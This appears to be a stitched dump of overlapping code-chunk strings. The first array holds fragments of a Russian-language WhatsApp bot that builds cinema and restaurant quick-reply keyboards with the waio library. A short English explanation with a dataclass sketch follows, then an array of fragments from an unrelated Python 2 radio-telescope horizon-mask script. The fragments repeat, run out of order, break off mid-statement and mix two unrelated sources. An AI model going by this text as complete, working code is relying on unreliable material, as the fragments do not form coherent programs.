kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb def generate_keyboard_cinema_time(): kb_content", "caption=\"this is the footer\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(type=\"start\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Сменить ресторан')).add(KeyboardButton(title='Новый ресторан'))", "использовалось kb_content = QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is the body\", caption=\"this is the footer\"", "удобное для Вас время\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return", "generate_keyboard_restaurant_time(): kb_content = QuickReplyContentText( header=\"Ресторан\", text=\"Выберите удобное для Вас время\", caption=\"\", ) kb", "from callback import callback_reply_keyboard def generate_keyboard_place(): kb_content = QuickReplyContentText( header=\"Куда вы сегодня хотите", "callback_reply_keyboard def generate_keyboard_place(): kb_content = QuickReplyContentText( header=\"Куда вы сегодня хотите сходить?\", text=\"Выберите из", "import callback_reply_keyboard def generate_keyboard_place(): kb_content = QuickReplyContentText( header=\"Куда вы сегодня хотите сходить?\", text=\"Выберите", "header=\"Куда вы сегодня хотите сходить?\", text=\"Выберите из 
предложенного списка\", caption=\"\" ) kb =", "изображением, вместо заголовка. В примере не использовалось kb_content = QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is", "from waio.keyboard.reply import QuickReplyContentText, QuickReply, KeyboardButton, QuickReplyContentImage from callback import callback_reply_keyboard def generate_keyboard_place():", "не использовалось kb_content = QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is the body\", caption=\"this is the", "# Можно отправить клавиатуру с изображением, вместо заголовка. В примере не использовалось kb_content", "= QuickReplyContentText( header=\"Ресторан\", text=\"Выберите удобное для Вас время\", caption=\"\", ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\",", "Можно отправить клавиатуру с изображением, вместо заголовка. В примере не использовалось kb_content =", "сходить?\", text=\"Выберите из предложенного списка\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан'))", "списка\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb def generate_keyboard_cinema_time():", "id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb def generate_keyboard_restaurant_time(): kb_content = QuickReplyContentText( header=\"Ресторан\", text=\"Выберите удобное", "удобное для Вас время\", caption=\"\", ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return", "id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb def generate_keyboard_image(): # Можно отправить клавиатуру с изображением,", "is the footer\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(type=\"start\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Сменить ресторан')).add(KeyboardButton(title='Новый ресторан')) return", "is the body\", caption=\"this is the footer\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(type=\"start\", id=\"1\"), content=kb_content)", "QuickReplyContentImage from callback import callback_reply_keyboard def generate_keyboard_place(): kb_content = QuickReplyContentText( header=\"Куда вы сегодня", "kb_content = QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите удобное для Вас время\", caption=\"\" ) kb =", "kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb def generate_keyboard_image(): # Можно отправить клавиатуру с изображением, вместо заголовка." ]
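All four helpers follow the same build-content, wrap-in-QuickReply, chain-.add() pattern. For readers without the waio library, here is a dependency-free sketch of that pattern; these dataclasses are illustrative stand-ins, not waio's real types.

# Minimal, library-free sketch of the quick-reply pattern above.
from dataclasses import dataclass, field
from typing import List


@dataclass
class Button:
    title: str


@dataclass
class Keyboard:
    callback_data: str
    header: str
    buttons: List[Button] = field(default_factory=list)

    def add(self, button: Button) -> "Keyboard":
        # Returning self is what makes the chained .add().add() style work.
        self.buttons.append(button)
        return self


kb = Keyboard(callback_data="place:1", header="Where to?")
kb.add(Button("Cinema")).add(Button("Restaurant"))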
[ "plus the atmospheric noise contrabution at 10 degrees\" \"elevation as per R.T. 199", "set of data files.') parser.add_option('-a', '--baseline', dest='baseline', type=\"string\", metavar='BASELINE', default='A1A1', help=\"Baseline to load", "= (azimuth, elevation, temp) np.array(azimuth)<-89 print \"Gridding the data\" print \"data shape =", "This is calculated \" \"as the T_sys at zenith plus the atmospheric noise", "Check arguments if len(args) < 1: raise RuntimeError('Please specify the data file to", "dest='split', action=\"store_true\", metavar='SPLIT', default=False, help=\"Whether to split each horizon plot in half\") parser.add_option('-z',", "= np.zeros((len(np.arange(-90,271,1)),2)) for i,az in enumerate(np.arange(-90,271,1)): print 'at az %f'%(az,) maskr[i] = az,np.max(elevation)", "\",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1))) # The +361", "for s in d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth) == len(elevation) == len(temp),", "calculated \" \"as the T_sys at zenith plus the atmospheric noise contrabution at", "raise RuntimeError('Please specify the data file to reduce') # Load data set gridtemp", "the mask. This is calculated \" \"as the T_sys at zenith plus the", "angle from (azel) target associated with scan, in degrees azimuth, elevation, temp =", "dest='output', type=\"string\", metavar='OUTPUTFILE', default=None, help=\"Write out intermediate h5 file\") parser.add_option('-s', '--split', dest='split', action=\"store_true\",", "\"elevation as per R.T. 199 .\") parser.add_option(\"-n\", \"--nd-models\", help=\"Name of optional directory containing", "in degrees azimuth, elevation, temp = [], [], [] for s in d.scans:", "atmospheric noise contrabution at 10 degrees\" \"elevation as per R.T. 
199 .\") parser.add_option(\"-n\",", "dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees to rotate azimuth window by.\") parser.add_option('--temp-limit', dest='temp_limit', type='float',", "to split each horizon plot in half\") parser.add_option('-z', '--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0,", "%f'%(az,) maskr[i] = az,np.max(elevation) for j,el in enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i] and ~mask.mask[j,i] :", "as it is just for sorting out a boundery condition print \"Completed Gridding", "from (azel) target associated with scan, in degrees azimuth, elevation, temp = [],", "set gridtemp = [] for filename in args: print 'Loading baseline', opts.baseline, 'from", "out a boundery condition print \"Completed Gridding the data\" print \"Making the mask\"", ">= opts.temp_limit) maskr = np.zeros((len(np.arange(-90,271,1)),2)) for i,az in enumerate(np.arange(-90,271,1)): print 'at az %f'%(az,)", "def main(): # Parse command-line options and arguments parser = optparse.OptionParser(usage='%prog [options] <data", "'Loading baseline', opts.baseline, 'from data file', filename d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs)", "opts.baseline, 'from data file', filename d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs) > 1:", "load (e.g. 'A1A1' for antenna 1), default is first single-dish baseline in file\")", "Only keep main scans (discard slew and cal scans) a d = d.select(freqkeep=range(200,", "= d.select(labelkeep='scan', copy=False) # Average all frequency channels into one band d.average() #", "of data files.') parser.add_option('-a', '--baseline', dest='baseline', type=\"string\", metavar='BASELINE', default='A1A1', help=\"Baseline to load (e.g.", "a set of data files.') parser.add_option('-a', '--baseline', dest='baseline', type=\"string\", metavar='BASELINE', default='A1A1', help=\"Baseline to", "= scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d def main(): # Parse command-line options and arguments parser", "mask import optparse import numpy as np import matplotlib.pyplot as plt import matplotlib.mlab", "'at az %f'%(az,) maskr[i] = az,np.max(elevation) for j,el in enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i] and", "Limit to make the cut-off for the mask. 
This is calculated \" \"as", "associated with scan, in degrees azimuth, elevation, temp = [], [], [] for", "and elevation angle from (azel) target associated with scan, in degrees azimuth, elevation,", "('Azimuth (deg)', 'Elevation (deg)', 'Mask for %s' % (opts.baseline,)) #plt.xlabel(az_title) #plt.ylabel(el_title) #plt.ylim(0,15) #plt.title(big_title)", "d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d = d.select(flagkeep='~nd_on') d = d.select(labelkeep='scan', copy=False) # Average", "\"sizes don't match\" data = (azimuth, elevation, temp) np.array(azimuth)<-89 print \"Gridding the data\"", "break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1, 1, 1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title = ('Azimuth (deg)', 'Elevation (deg)',", "parser = optparse.OptionParser(usage='%prog [options] <data file> [<data file> ...]', description='Display a horizon mask", "to rotate azimuth window by.\") parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0, help=\"The Tempreture Limit to", "data\" print \"Making the mask\" mask = gridtemp[0] >= opts.temp_limit for grid in", "= d.select(flagkeep='~nd_on') d = d.select(labelkeep='scan', copy=False) # Average all frequency channels into one", "(azimuth, elevation, temp) np.array(azimuth)<-89 print \"Gridding the data\" print \"data shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist())", "cal scans) a d = d.select(freqkeep=range(200, 800)) d = remove_rfi(d,width=7,sigma=5) d = d.convert_power_to_temperature(min_duration=3,", "= scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs) > 1: # Only keep main scans (discard", "intermediate h5 file\") parser.add_option('-s', '--split', dest='split', action=\"store_true\", metavar='SPLIT', default=False, help=\"Whether to split each", "Plot horizon mask import optparse import numpy as np import matplotlib.pyplot as plt", "= az,np.max(elevation) for j,el in enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i] and ~mask.mask[j,i] : maskr[i] =", "of optional directory containing noise diode model files\") (opts, args) = parser.parse_args() #", "np import matplotlib.pyplot as plt import matplotlib.mlab as mlab import scape from katpoint", "= \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1))) # The", "# Load data set gridtemp = [] for filename in args: print 'Loading", "contrabution at 10 degrees\" \"elevation as per R.T. 
199 .\") parser.add_option(\"-n\", \"--nd-models\", help=\"Name", "d = d.select(flagkeep='~nd_on') d = d.select(labelkeep='scan', copy=False) # Average all frequency channels into", "help=\"Name of optional directory containing noise diode model files\") (opts, args) = parser.parse_args()", "'from data file', filename d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs) > 1: #", "jump_significance=4.0) d = d.select(flagkeep='~nd_on') d = d.select(labelkeep='scan', copy=False) # Average all frequency channels", "default=45.0, help=\"Degrees to rotate azimuth window by.\") parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0, help=\"The Tempreture", "T_sys at zenith plus the atmospheric noise contrabution at 10 degrees\" \"elevation as", "point are well spaced, #this offset is not a problem as it is", ">= opts.temp_limit for grid in gridtemp: mask = mask * (grid >= opts.temp_limit)", "in d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth) == len(elevation) == len(temp), \"sizes don't", "it is just for sorting out a boundery condition print \"Completed Gridding the", "> 1: # Only keep main scans (discard slew and cal scans) a", "print 'at az %f'%(az,) maskr[i] = az,np.max(elevation) for j,el in enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i]", "frequency channels into one band d.average() # Extract azimuth and elevation angle from", "remove_rfi(d,width=7,sigma=5) d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d = d.select(flagkeep='~nd_on') d = d.select(labelkeep='scan', copy=False) #", "(opts, args) = parser.parse_args() # Check arguments if len(args) < 1: raise RuntimeError('Please", "in range(len(d.scans)): d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d def main(): # Parse command-line options", "type='float', metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees to rotate azimuth window by.\") parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0,", "data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1))) # The +361 is to ensure that the point are", "= d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d = d.select(flagkeep='~nd_on') d = d.select(labelkeep='scan', copy=False) # Average all", "print \"Gridding the data\" print \"data shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist())", "# Plot horizon mask import optparse import numpy as np import matplotlib.pyplot as", "1, 1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title = ('Azimuth (deg)', 'Elevation (deg)', 'Mask for %s' %", "np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1, 1, 1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title = ('Azimuth (deg)', 'Elevation (deg)', 'Mask", "remove_rfi(d,width=3,sigma=5,axis=1): for i in range(len(d.scans)): d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d def main(): #", "to ensure that the point are well spaced, #this offset is not a", "~mask.data[j,i] and ~mask.mask[j,i] : maskr[i] = az,el break 
np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1, 1, 1)", "data = (azimuth, elevation, temp) np.array(azimuth)<-89 print \"Gridding the data\" print \"data shape", "[] for s in d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth) == len(elevation) ==", "optional directory containing noise diode model files\") (opts, args) = parser.parse_args() # Check", "# Average all frequency channels into one band d.average() # Extract azimuth and", "temp = [], [], [] for s in d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert", "(discard slew and cal scans) a d = d.select(freqkeep=range(200, 800)) d = remove_rfi(d,width=7,sigma=5)", "maskr = np.zeros((len(np.arange(-90,271,1)),2)) for i,az in enumerate(np.arange(-90,271,1)): print 'at az %f'%(az,) maskr[i] =", "dest='temp_limit', type='float', default=40.0, help=\"The Tempreture Limit to make the cut-off for the mask.", "per R.T. 199 .\") parser.add_option(\"-n\", \"--nd-models\", help=\"Name of optional directory containing noise diode", "len(elevation) == len(temp), \"sizes don't match\" data = (azimuth, elevation, temp) np.array(azimuth)<-89 print", "az %f'%(az,) maskr[i] = az,np.max(elevation) for j,el in enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i] and ~mask.mask[j,i]", "mask\" mask = gridtemp[0] >= opts.temp_limit for grid in gridtemp: mask = mask", "mlab import scape from katpoint import rad2deg def remove_rfi(d,width=3,sigma=5,axis=1): for i in range(len(d.scans)):", "== len(temp), \"sizes don't match\" data = (azimuth, elevation, temp) np.array(azimuth)<-89 print \"Gridding", "horizon plot in half\") parser.add_option('-z', '--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees to rotate", "= gridtemp[0] >= opts.temp_limit for grid in gridtemp: mask = mask * (grid", "...]', description='Display a horizon mask from a set of data files.') parser.add_option('-a', '--baseline',", "gridtemp: mask = mask * (grid >= opts.temp_limit) maskr = np.zeros((len(np.arange(-90,271,1)),2)) for i,az", "in enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i] and ~mask.mask[j,i] : maskr[i] = az,el break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure()", "antenna 1), default is first single-dish baseline in file\") parser.add_option('-o', '--output', dest='output', type=\"string\",", "len(d.freqs) > 1: # Only keep main scans (discard slew and cal scans)", "file', filename d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs) > 1: # Only keep", "%s' % (opts.baseline,)) #plt.xlabel(az_title) #plt.ylabel(el_title) #plt.ylim(0,15) #plt.title(big_title) #plt.show() if __name__ == \"__main__\": main()", "band d.average() # Extract azimuth and elevation angle from (azel) target associated with", "is just for sorting out a boundery condition print \"Completed Gridding the data\"", "temp) np.array(azimuth)<-89 print \"Gridding the data\" print \"data shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist())", "elevation angle from (azel) target associated with scan, in degrees azimuth, elevation, temp", "for i,az in enumerate(np.arange(-90,271,1)): print 'at az %f'%(az,) maskr[i] = 
az,np.max(elevation) for j,el", "options and arguments parser = optparse.OptionParser(usage='%prog [options] <data file> [<data file> ...]', description='Display", "for antenna 1), default is first single-dish baseline in file\") parser.add_option('-o', '--output', dest='output',", "azimuth window by.\") parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0, help=\"The Tempreture Limit to make the", "[], [], [] for s in d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth) ==", "the point are well spaced, #this offset is not a problem as it", "file> ...]', description='Display a horizon mask from a set of data files.') parser.add_option('-a',", "default='A1A1', help=\"Baseline to load (e.g. 'A1A1' for antenna 1), default is first single-dish", "by.\") parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0, help=\"The Tempreture Limit to make the cut-off for", "is first single-dish baseline in file\") parser.add_option('-o', '--output', dest='output', type=\"string\", metavar='OUTPUTFILE', default=None, help=\"Write", "all frequency channels into one band d.average() # Extract azimuth and elevation angle", "1: raise RuntimeError('Please specify the data file to reduce') # Load data set", "parser.add_option('-a', '--baseline', dest='baseline', type=\"string\", metavar='BASELINE', default='A1A1', help=\"Baseline to load (e.g. 'A1A1' for antenna", "horizon mask import optparse import numpy as np import matplotlib.pyplot as plt import", "# Only keep main scans (discard slew and cal scans) a d =", "(deg)', 'Mask for %s' % (opts.baseline,)) #plt.xlabel(az_title) #plt.ylabel(el_title) #plt.ylim(0,15) #plt.title(big_title) #plt.show() if __name__", "are well spaced, #this offset is not a problem as it is just", "as np import matplotlib.pyplot as plt import matplotlib.mlab as mlab import scape from", "mask = gridtemp[0] >= opts.temp_limit for grid in gridtemp: mask = mask *", "command-line options and arguments parser = optparse.OptionParser(usage='%prog [options] <data file> [<data file> ...]',", "az,el break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1, 1, 1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title = ('Azimuth (deg)', 'Elevation", "(e.g. 
'A1A1' for antenna 1), default is first single-dish baseline in file\") parser.add_option('-o',", "= [], [], [] for s in d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth)", "directory containing noise diode model files\") (opts, args) = parser.parse_args() # Check arguments", "gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1))) # The +361 is to ensure that the", "is not a problem as it is just for sorting out a boundery", "to reduce') # Load data set gridtemp = [] for filename in args:", "assert len(azimuth) == len(elevation) == len(temp), \"sizes don't match\" data = (azimuth, elevation,", "from katpoint import rad2deg def remove_rfi(d,width=3,sigma=5,axis=1): for i in range(len(d.scans)): d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma)", "numpy as np import matplotlib.pyplot as plt import matplotlib.mlab as mlab import scape", "baseline in file\") parser.add_option('-o', '--output', dest='output', type=\"string\", metavar='OUTPUTFILE', default=None, help=\"Write out intermediate h5", "print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1))) # The +361 is", "import scape from katpoint import rad2deg def remove_rfi(d,width=3,sigma=5,axis=1): for i in range(len(d.scans)): d.scans[i].data", "main scans (discard slew and cal scans) a d = d.select(freqkeep=range(200, 800)) d", "\"Completed Gridding the data\" print \"Making the mask\" mask = gridtemp[0] >= opts.temp_limit", "az,np.max(elevation) for j,el in enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i] and ~mask.mask[j,i] : maskr[i] = az,el", "parser.add_option('-s', '--split', dest='split', action=\"store_true\", metavar='SPLIT', default=False, help=\"Whether to split each horizon plot in", "with scan, in degrees azimuth, elevation, temp = [], [], [] for s", "filename d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs) > 1: # Only keep main", "type=\"string\", metavar='OUTPUTFILE', default=None, help=\"Write out intermediate h5 file\") parser.add_option('-s', '--split', dest='split', action=\"store_true\", metavar='SPLIT',", "optparse import numpy as np import matplotlib.pyplot as plt import matplotlib.mlab as mlab", "reduce') # Load data set gridtemp = [] for filename in args: print", "#az_title,el_title,big_title = ('Azimuth (deg)', 'Elevation (deg)', 'Mask for %s' % (opts.baseline,)) #plt.xlabel(az_title) #plt.ylabel(el_title)", "= [] for filename in args: print 'Loading baseline', opts.baseline, 'from data file',", "problem as it is just for sorting out a boundery condition print \"Completed", "data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1))) # The +361 is to ensure that the point", "one band d.average() # Extract azimuth and elevation angle from (azel) 
target associated", "#plt.figure() #plt.subplot(1, 1, 1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title = ('Azimuth (deg)', 'Elevation (deg)', 'Mask for", "at zenith plus the atmospheric noise contrabution at 10 degrees\" \"elevation as per", "d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs) > 1: # Only keep main scans", "enumerate(np.arange(-90,271,1)): print 'at az %f'%(az,) maskr[i] = az,np.max(elevation) for j,el in enumerate(np.arange(4,16,0.1)): if", "katpoint import rad2deg def remove_rfi(d,width=3,sigma=5,axis=1): for i in range(len(d.scans)): d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return", "print \"Completed Gridding the data\" print \"Making the mask\" mask = gridtemp[0] >=", "for j,el in enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i] and ~mask.mask[j,i] : maskr[i] = az,el break", "just for sorting out a boundery condition print \"Completed Gridding the data\" print", "data set gridtemp = [] for filename in args: print 'Loading baseline', opts.baseline,", "d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d = d.select(flagkeep='~nd_on') d = d.select(labelkeep='scan', copy=False) # Average all frequency", "single-dish baseline in file\") parser.add_option('-o', '--output', dest='output', type=\"string\", metavar='OUTPUTFILE', default=None, help=\"Write out intermediate", "elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth) == len(elevation) == len(temp), \"sizes don't match\" data =", "parser.add_option(\"-n\", \"--nd-models\", help=\"Name of optional directory containing noise diode model files\") (opts, args)", "is calculated \" \"as the T_sys at zenith plus the atmospheric noise contrabution", "+361 is to ensure that the point are well spaced, #this offset is", "split each horizon plot in half\") parser.add_option('-z', '--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees", "* (grid >= opts.temp_limit) maskr = np.zeros((len(np.arange(-90,271,1)),2)) for i,az in enumerate(np.arange(-90,271,1)): print 'at", "import numpy as np import matplotlib.pyplot as plt import matplotlib.mlab as mlab import", "np.zeros((len(np.arange(-90,271,1)),2)) for i,az in enumerate(np.arange(-90,271,1)): print 'at az %f'%(az,) maskr[i] = az,np.max(elevation) for", "len(azimuth) == len(elevation) == len(temp), \"sizes don't match\" data = (azimuth, elevation, temp)", "not a problem as it is just for sorting out a boundery condition", "action=\"store_true\", metavar='SPLIT', default=False, help=\"Whether to split each horizon plot in half\") parser.add_option('-z', '--azshift',", "the atmospheric noise contrabution at 10 degrees\" \"elevation as per R.T. 
199 .\")", "description='Display a horizon mask from a set of data files.') parser.add_option('-a', '--baseline', dest='baseline',", "# Extract azimuth and elevation angle from (azel) target associated with scan, in", "matplotlib.mlab as mlab import scape from katpoint import rad2deg def remove_rfi(d,width=3,sigma=5,axis=1): for i", "plt import matplotlib.mlab as mlab import scape from katpoint import rad2deg def remove_rfi(d,width=3,sigma=5,axis=1):", "from a set of data files.') parser.add_option('-a', '--baseline', dest='baseline', type=\"string\", metavar='BASELINE', default='A1A1', help=\"Baseline", "default is first single-dish baseline in file\") parser.add_option('-o', '--output', dest='output', type=\"string\", metavar='OUTPUTFILE', default=None,", "the cut-off for the mask. This is calculated \" \"as the T_sys at", "if ~mask.data[j,i] and ~mask.mask[j,i] : maskr[i] = az,el break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1, 1,", "Tempreture Limit to make the cut-off for the mask. This is calculated \"", "scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs) > 1: # Only keep main scans (discard slew", "elevation, temp) np.array(azimuth)<-89 print \"Gridding the data\" print \"data shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print", "is to ensure that the point are well spaced, #this offset is not", "containing noise diode model files\") (opts, args) = parser.parse_args() # Check arguments if", "that the point are well spaced, #this offset is not a problem as", "parser.add_option('-z', '--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees to rotate azimuth window by.\") parser.add_option('--temp-limit',", "target associated with scan, in degrees azimuth, elevation, temp = [], [], []", "d = remove_rfi(d,width=7,sigma=5) d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d = d.select(flagkeep='~nd_on') d = d.select(labelkeep='scan',", "d def main(): # Parse command-line options and arguments parser = optparse.OptionParser(usage='%prog [options]", "for i in range(len(d.scans)): d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d def main(): # Parse", "files\") (opts, args) = parser.parse_args() # Check arguments if len(args) < 1: raise", "and cal scans) a d = d.select(freqkeep=range(200, 800)) d = remove_rfi(d,width=7,sigma=5) d =", "\"Making the mask\" mask = gridtemp[0] >= opts.temp_limit for grid in gridtemp: mask", "mask = mask * (grid >= opts.temp_limit) maskr = np.zeros((len(np.arange(-90,271,1)),2)) for i,az in", "type=\"string\", metavar='BASELINE', default='A1A1', help=\"Baseline to load (e.g. 
